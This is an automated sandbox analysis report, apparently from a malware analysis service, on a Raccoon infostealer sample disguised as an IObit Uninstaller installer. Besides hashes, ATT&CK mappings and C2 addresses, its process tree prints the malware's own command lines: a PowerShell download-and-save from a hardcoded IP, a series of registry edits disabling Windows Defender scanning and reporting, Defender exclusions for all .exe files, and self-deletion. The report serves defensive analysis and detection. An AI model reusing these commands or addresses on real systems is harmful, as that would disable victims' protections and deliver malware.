raccoon | bc92ac427770e9d3e2e12ed5f25d1a8d92c43f6342b675f6e1d2ec70b86601fe

Analysis

max time kernel
141s
max time network
144s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
20-09-2022 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0cbb101350a505349559995cac335687.exe
Size

22.8MB
MD5

0cbb101350a505349559995cac335687
SHA1

49fa668a551e694d3dc85b0dedadf6da2f7a79b7
SHA256

bc92ac427770e9d3e2e12ed5f25d1a8d92c43f6342b675f6e1d2ec70b86601fe
SHA512

36fe16fd2c18a056afa743879822cd845ff5498061f27e123530f665fbf1fadf1576a5c02c5c0e0f1af88cc2c40eaad618716c30b1c8d8812aa903938698586a
SSDEEP

393216:ne+m1n15+inMR/oArvMwVuwxTakRcLGZNXDqkV2R0h6g1Rkymg1:9InH7nMR/oExVrxe1L6JV2eh6g1Ky51

Score

10^/10

raccoon 9b19cf60d9bdf65b8a2495aa965456c3 evasion spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.159.248.145/hfile.bin

Extracted

Family

raccoon

Botnet

9b19cf60d9bdf65b8a2495aa965456c3

http://94.131.107.23/

http://45.11.19.99/

rc4.plain

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1176 powershell.exe
Downloads MZ/PE file

flow	pid	process
3	1176	powershell.exe

Executes dropped EXE 14 IoCs

Processes:

0cbb101350a505349559995cac335687.tmpIObit Uninstaller 11.6.0.12.exeIObit Uninstaller 11.6.0.12.tmp7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeInstallUtil.exe

pid	process
1676	0cbb101350a505349559995cac335687.tmp
1748	IObit Uninstaller 11.6.0.12.exe
1996	IObit Uninstaller 11.6.0.12.tmp
572	7za.exe
604	7za.exe
1628	7za.exe
1720	7za.exe
952	7za.exe
1788	7za.exe
2028	7za.exe
1348	7za.exe
1572	7za.exe
1708	7za.exe
1932	InstallUtil.exe

Loads dropped DLL 23 IoCs

Processes:

0cbb101350a505349559995cac335687.exe0cbb101350a505349559995cac335687.tmpIObit Uninstaller 11.6.0.12.exeIObit Uninstaller 11.6.0.12.tmpcmd.execmd.exeInstallUtil.exe

pid	process
1788	0cbb101350a505349559995cac335687.exe
1676	0cbb101350a505349559995cac335687.tmp
1676	0cbb101350a505349559995cac335687.tmp
1748	IObit Uninstaller 11.6.0.12.exe
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
2040	cmd.exe
2040	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1512	cmd.exe
1584	InstallUtil.exe
1584	InstallUtil.exe
1584	InstallUtil.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

InstallUtil.exe

description pid process target process

PID 1932 set thread context of 1584 1932 InstallUtil.exe InstallUtil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1148 PING.EXE
1344 PING.EXE
1488 PING.EXE

description	pid	process	target process
PID 1932 set thread context of 1584	1932	InstallUtil.exe	InstallUtil.exe

pid	process
1148	PING.EXE
1344	PING.EXE
1488	PING.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

0cbb101350a505349559995cac335687.tmpIObit Uninstaller 11.6.0.12.tmppowershell.exepowershell.exepowershell.exeInstallUtil.exe

pid	process
1676	0cbb101350a505349559995cac335687.tmp
1676	0cbb101350a505349559995cac335687.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1176	powershell.exe
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1808	powershell.exe
584	powershell.exe
1932	InstallUtil.exe
1932	InstallUtil.exe
1932	InstallUtil.exe
1932	InstallUtil.exe
1932	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1176 powershell.exe
Token: SeDebugPrivilege 1808 powershell.exe
Token: SeDebugPrivilege 584 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

0cbb101350a505349559995cac335687.tmp

pid process

1676 0cbb101350a505349559995cac335687.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

IObit Uninstaller 11.6.0.12.tmp

pid process

1996 IObit Uninstaller 11.6.0.12.tmp
1996 IObit Uninstaller 11.6.0.12.tmp
1996 IObit Uninstaller 11.6.0.12.tmp

description	pid	process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe

pid	process
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp
1996	IObit Uninstaller 11.6.0.12.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0cbb101350a505349559995cac335687.exe0cbb101350a505349559995cac335687.tmpIObit Uninstaller 11.6.0.12.execmd.exeIObit Uninstaller 11.6.0.12.tmpnet.exeWScript.execmd.exe

description	pid	process	target process
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1788 wrote to memory of 1676	1788	0cbb101350a505349559995cac335687.exe	0cbb101350a505349559995cac335687.tmp
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 1748	1676	0cbb101350a505349559995cac335687.tmp	IObit Uninstaller 11.6.0.12.exe
PID 1676 wrote to memory of 2040	1676	0cbb101350a505349559995cac335687.tmp	cmd.exe
PID 1676 wrote to memory of 2040	1676	0cbb101350a505349559995cac335687.tmp	cmd.exe
PID 1676 wrote to memory of 2040	1676	0cbb101350a505349559995cac335687.tmp	cmd.exe
PID 1676 wrote to memory of 2040	1676	0cbb101350a505349559995cac335687.tmp	cmd.exe
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 1748 wrote to memory of 1996	1748	IObit Uninstaller 11.6.0.12.exe	IObit Uninstaller 11.6.0.12.tmp
PID 2040 wrote to memory of 1176	2040	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1176	2040	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1176	2040	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1176	2040	cmd.exe	powershell.exe
PID 1996 wrote to memory of 668	1996	IObit Uninstaller 11.6.0.12.tmp	net.exe
PID 1996 wrote to memory of 668	1996	IObit Uninstaller 11.6.0.12.tmp	net.exe
PID 1996 wrote to memory of 668	1996	IObit Uninstaller 11.6.0.12.tmp	net.exe
PID 1996 wrote to memory of 668	1996	IObit Uninstaller 11.6.0.12.tmp	net.exe
PID 668 wrote to memory of 1348	668	net.exe	net1.exe
PID 668 wrote to memory of 1348	668	net.exe	net1.exe
PID 668 wrote to memory of 1348	668	net.exe	net1.exe
PID 668 wrote to memory of 1348	668	net.exe	net1.exe
PID 2040 wrote to memory of 572	2040	cmd.exe	7za.exe
PID 2040 wrote to memory of 572	2040	cmd.exe	7za.exe
PID 2040 wrote to memory of 572	2040	cmd.exe	7za.exe
PID 2040 wrote to memory of 572	2040	cmd.exe	7za.exe
PID 2040 wrote to memory of 1344	2040	cmd.exe	PING.EXE
PID 2040 wrote to memory of 1344	2040	cmd.exe	PING.EXE
PID 2040 wrote to memory of 1344	2040	cmd.exe	PING.EXE
PID 2040 wrote to memory of 1344	2040	cmd.exe	PING.EXE
PID 2040 wrote to memory of 1612	2040	cmd.exe	WScript.exe
PID 2040 wrote to memory of 1612	2040	cmd.exe	WScript.exe
PID 2040 wrote to memory of 1612	2040	cmd.exe	WScript.exe
PID 2040 wrote to memory of 1612	2040	cmd.exe	WScript.exe
PID 1612 wrote to memory of 1724	1612	WScript.exe	cmd.exe
PID 1612 wrote to memory of 1724	1612	WScript.exe	cmd.exe
PID 1612 wrote to memory of 1724	1612	WScript.exe	cmd.exe
PID 1612 wrote to memory of 1724	1612	WScript.exe	cmd.exe
PID 1724 wrote to memory of 1828	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1828	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1828	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1828	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 692	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 692	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 692	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 692	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1004	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1004	1724	cmd.exe	reg.exe
PID 1724 wrote to memory of 1004	1724	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\0cbb101350a505349559995cac335687.exe
"C:\Users\Admin\AppData\Local\Temp\0cbb101350a505349559995cac335687.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1788

C:\Users\Admin\AppData\Local\Temp\is-F3BJ7.tmp\0cbb101350a505349559995cac335687.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F3BJ7.tmp\0cbb101350a505349559995cac335687.tmp" /SL5="$60122,22746193,1185280,C:\Users\Admin\AppData\Local\Temp\0cbb101350a505349559995cac335687.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1676

C:\Users\Admin\AppData\Local\Temp\is-I7OLG.tmp\IObit Uninstaller 11.6.0.12.exe
"C:\Users\Admin\AppData\Local\Temp\is-I7OLG.tmp\IObit Uninstaller 11.6.0.12.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\is-HTHQA.tmp\IObit Uninstaller 11.6.0.12.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HTHQA.tmp\IObit Uninstaller 11.6.0.12.tmp" /SL5="$101B6,20970856,79872,C:\Users\Admin\AppData\Local\Temp\is-I7OLG.tmp\IObit Uninstaller 11.6.0.12.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\net.exe
"net" stop "IObit Uninstaller Service"
5⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IObit Uninstaller Service"
6⤵
PID:1348

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\main.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -command "(New-Object System.Net.WebClient).DownloadFile('http://45.159.248.145/hfile.bin', 'hfile.bin')";
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
4⤵
- Executes dropped EXE
PID:572

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:1344

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\ControlSet003.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:336

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:300

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:804

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:1336

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:552

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:432

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:764

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:656

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
6⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:568

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SurfaceReduction"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension ".exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\compil32_obf.bat" "
5⤵
- Loads dropped DLL
PID:1512

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:1592

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e file.zip -p4925gxyNkqEHZ4611gxyNkqEHZ16656 -oextracted
6⤵
- Executes dropped EXE
PID:604

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:1628

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:1720

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:952

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:1788

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:2028

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:1348

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:1572

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1708

C:\ProgramData\SurfaceReduction\InstallUtil.exe
"InstallUtil.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
- Loads dropped DLL
PID:1584

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\ControlSet002.bat" "
5⤵
PID:1392

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:1488

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"
6⤵
PID:1716

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:1148

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat
Filesize
71KB

MD5
85683ccbdd6d1a89ee8fae20d364928b

SHA1
77af8e1a3102958106fa620e7795109b1e135aa2

SHA256
fbe63b3379637817de60c8db5392a75c2f5731f4a864f8bfb1f68b4eb20ac7d6

SHA512
2b974b64b0f7154390b730e265e58f6bb7d239e8ce62f3e64453c1d0b3119643fde00d2a2d1cf3b234905ab7687f2207d48c1cf8c1b033a745956f1cd3670877

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet002.bat
Filesize
186B

MD5
d62adedd663f3bc437e8c234bd818fe8

SHA1
785984b360807df58434723f588a5dfc94b5e7a1

SHA256
6cbc7c7a5ca124d27f3bf0f407fe8e1af5009313cb2f31c6de320b2549857333

SHA512
4b1dc05aee7621570466aadf4bdc0b866fa0e386615eae92a4b382af83c35c6af97276eab6a4f7a51a783dbfb4b61cf3139eb007080f3a13a13a3260e75227ea

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet003.vbs
Filesize
6KB

MD5
4b47d820e1ba7ea36ca0ddebda829ab3

SHA1
c5a018b519a3892cfd262198c04584d909af809c

SHA256
4d770c50ff8d5aa91acf39abf462ff30ecb83e5b2ffc4bb03f356ecde2f516b9

SHA512
